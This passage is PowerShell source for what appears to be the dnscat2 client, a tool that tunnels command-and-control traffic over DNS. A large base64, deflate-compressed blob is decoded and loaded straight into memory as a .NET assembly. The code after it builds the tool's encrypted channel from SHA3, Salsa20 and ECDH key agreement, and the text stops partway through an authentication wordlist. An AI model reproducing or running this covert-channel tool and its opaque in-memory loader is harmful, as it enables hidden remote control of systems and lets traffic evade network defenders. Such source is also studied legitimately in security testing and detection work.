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 '@ $DeflatedStream = New-Object IO.Compression.DeflateStream([IO.MemoryStream][Convert]::FromBase64String($EncodedCompressedFile),[IO.Compression.CompressionMode]::Decompress) $UncompressedFileBytes = New-Object Byte[](2236416) $DeflatedStream.Read($UncompressedFileBytes, 0, 2236416) | Out-Null [Reflection.Assembly]::Load($UncompressedFileBytes) | Out-Null function Get-SHA3 ($Bytes) { $SHA3 = New-Object Org.BouncyCastle.Crypto.Digests.Sha3Digest(256) [Byte[]]$Digest = (1..$SHA3.GetDigestSize()) |% {0} $SHA3.BlockUpdate($Bytes, 0, $Bytes.Length) $SHA3.DoFinal($Digest, 0) | Out-Null return $Digest } function Convert-Salsa20 ($Bytes, $Key, $IV) { $KeyParameter = New-Object Org.BouncyCastle.Crypto.Parameters.KeyParameter($Key, 0, 32) $ParamsWithIV = New-Object Org.BouncyCastle.Crypto.Parameters.ParametersWithIV($KeyParameter, $IV) $Salsa20 = New-Object Org.BouncyCastle.Crypto.Engines.Salsa20Engine $Salsa20.Init($True, $ParamsWithIV) [byte[]]$OutBytes = @(0)*($Bytes.Length) $Salsa20.ProcessBytes($Bytes, 0, $OutBytes.Length, $OutBytes, 0) return $OutBytes } function Convert-StringToHex ($String) { return ([System.BitConverter]::ToString([System.Text.Encoding]::UTF8.GetBytes($String)).split("-") -join "") } function Convert-BytesToHex ($Bytes) { return ([System.BitConverter]::ToString($Bytes) -replace '-') } # Converts a hex string to a byte array of 16 bit elements # Input String must have an even length function Convert-HexToBytes ($Hex) { [byte[]]$Bytes = @() while ($Hex.Length -gt 0) { $Bytes += [Convert]::ToInt16(($Hex[0..1] -join ""),16) $Hex = $Hex.Substring(2) } return $Bytes } function Convert-HexToString ($Hex) { $StringData = "" while ($Hex.Length -gt 0) { $StringData += [string][char][Convert]::ToInt16(($Hex[0..1] -join ""),16) $Hex = $Hex.Substring(2) } return $StringData } function Get-SharedSecret ($client_private_key, $server_public_key_x, $server_public_key_y) { $client_private_key_bigint = New-Object Org.BouncyCastle.Math.BigInteger(1, [byte[]](Convert-HexToBytes $client_private_key.ToString())) $server_public_key_x_bigint = New-Object Org.BouncyCastle.Math.BigInteger(1, [byte[]](Convert-HexToBytes $server_public_key_x.ToString())) $server_public_key_y_bigint = New-Object Org.BouncyCastle.Math.BigInteger(1, [byte[]](Convert-HexToBytes $server_public_key_y.ToString())) [Org.BouncyCastle.Crypto.Agreement.ECDHCBasicAgreement] $agreement = New-Object Org.BouncyCastle.Crypto.Agreement.ECDHCBasicAgreement [Org.BouncyCastle.Asn1.X9.X9ECParameters] $curve = $null [Org.BouncyCastle.Crypto.Parameters.ECDomainParameters] $ecParam = $null [Org.BouncyCastle.Crypto.Parameters.ECPrivateKeyParameters] $privKey = $null [Org.BouncyCastle.Crypto.Parameters.ECPublicKeyParameters] $pubKey = $null [Org.BouncyCastle.Math.EC.ECPoint] $point = $null $curve = [Org.BouncyCastle.Asn1.Nist.NistNamedCurves]::GetByName("P-256") $ecParam = New-Object Org.BouncyCastle.Crypto.Parameters.ECDomainParameters($curve.Curve, $curve.G, $curve.N, $curve.H, $curve.GetSeed()) $privKey = New-Object Org.BouncyCastle.Crypto.Parameters.ECPrivateKeyParameters($client_private_key_bigint, $ecParam) $point = $ecParam.Curve.CreatePoint($server_public_key_x_bigint, $server_public_key_y_bigint, $False ) $pubKey = New-Object Org.BouncyCastle.Crypto.Parameters.ECPublicKeyParameters($point, $ecParam) $agreement.Init($privKey); [Org.BouncyCastle.Math.BigInteger]$secret = $agreement.CalculateAgreement( $pubKey ) return $secret.ToByteArrayUnsigned() } function Get-Dnscat2StreamKeys ($EncryptionKeys) { $EncryptionKeys["client_write"] = Get-SHA3 ($EncryptionKeys["shared_secret"] + ([System.Text.Encoding]::ASCII.GetBytes("client_write_key"))) $EncryptionKeys["client_mac"] = Get-SHA3 ($EncryptionKeys["shared_secret"] + ([System.Text.Encoding]::ASCII.GetBytes("client_mac_key"))) $EncryptionKeys["server_write"] = Get-SHA3 ($EncryptionKeys["shared_secret"] + ([System.Text.Encoding]::ASCII.GetBytes("server_write_key"))) $EncryptionKeys["server_mac"] = Get-SHA3 ($EncryptionKeys["shared_secret"] + ([System.Text.Encoding]::ASCII.GetBytes("server_mac_key"))) return $EncryptionKeys } function Get-Dnscat2PacketSignature ($mac_key, $PacketHeader, $IV, $EncryptedPacketBody) { return [byte[]]((Get-SHA3 ($mac_key + $PacketHeader + $IV + $EncryptedPacketBody))[0..5]) } function Get-Dnscat2PeerAuthStrings ($EncryptionKeys) { $EncryptionKeys["client_auth"] = Get-SHA3 (([System.Text.Encoding]::ASCII.GetBytes("client")) + $EncryptionKeys["pubkey_client"] + $EncryptionKeys["pubkey_server"] + $EncryptionKeys["PreSharedSecret"]) $EncryptionKeys["server_auth"] = Get-SHA3 (([System.Text.Encoding]::ASCII.GetBytes("server")) + $EncryptionKeys["pubkey_client"] + $EncryptionKeys["pubkey_server"] + $EncryptionKeys["PreSharedSecret"]) return $EncryptionKeys } function Get-Dnscat2ShortAuthString ($SharedSecret, $ClientPublicKey, $ServerPublicKey) { $Wordlist = @('Abate','Absorb','Ache','Acidy','Across','After','Alike','Amount','Amuse','Annoy','Annuls','Ardent','Ascot','Bait','Barons','Barret','Bask','Becurl','Befool','Bell','Bifold','Bogie','Boxen','Bozo','Broke','Bulby','Bunny','Calmly','Canary','Cargo','Chirp','Chroma','Cleft','Coke','Column','Comely','Cometh','Convoy','Corn','Cough','Cruxes','Cued','Darter','Dash','Dating','Deadly','Deaf','Decade','Deepen','Depict','Domed','Dorper','Drafts','Dried','Duff','Durian','Early','Easily','Eggars','Emboss','Emit','Encode','Ennui','Envied','Essay','Evites','Evoke','Exotic','Facile','Fate','Feisty','Fewest','Fifty','Filth','Finer','Fished','Flacks','Flaunt','Fleecy','Flied','Foams','Foxes','Freely','Frozen','Genome','Gibbon','Gifts','Giving','Gold','Gone','Gouge','Grocer','Grows','Half','Handle','Harold','Harp','Hedges','Hither','Hobbit','Hobble','Hoods','Hooked','Horror','Horsed','Hound','Huns','Ices','Impish','Jiber','Jiggy','Kelpy','Keyman','Khan','Killer','Klutzy','Lair','Lashes','Libate','Liming','Lonely','Looks','Lordy','Lush','Mailer','Maps','Mayo','Mcgill','Mona','Motive','Mousy','Neigh','Ninjas','Nodule','Nuns','Obese','Olive','Omelet','Omen','Otto','Outran','Ouzo','Owls','Papism','Parrot','Peace','Pearly','Peaty','Pedal','Pegged','Petals','Phials','Pianos','P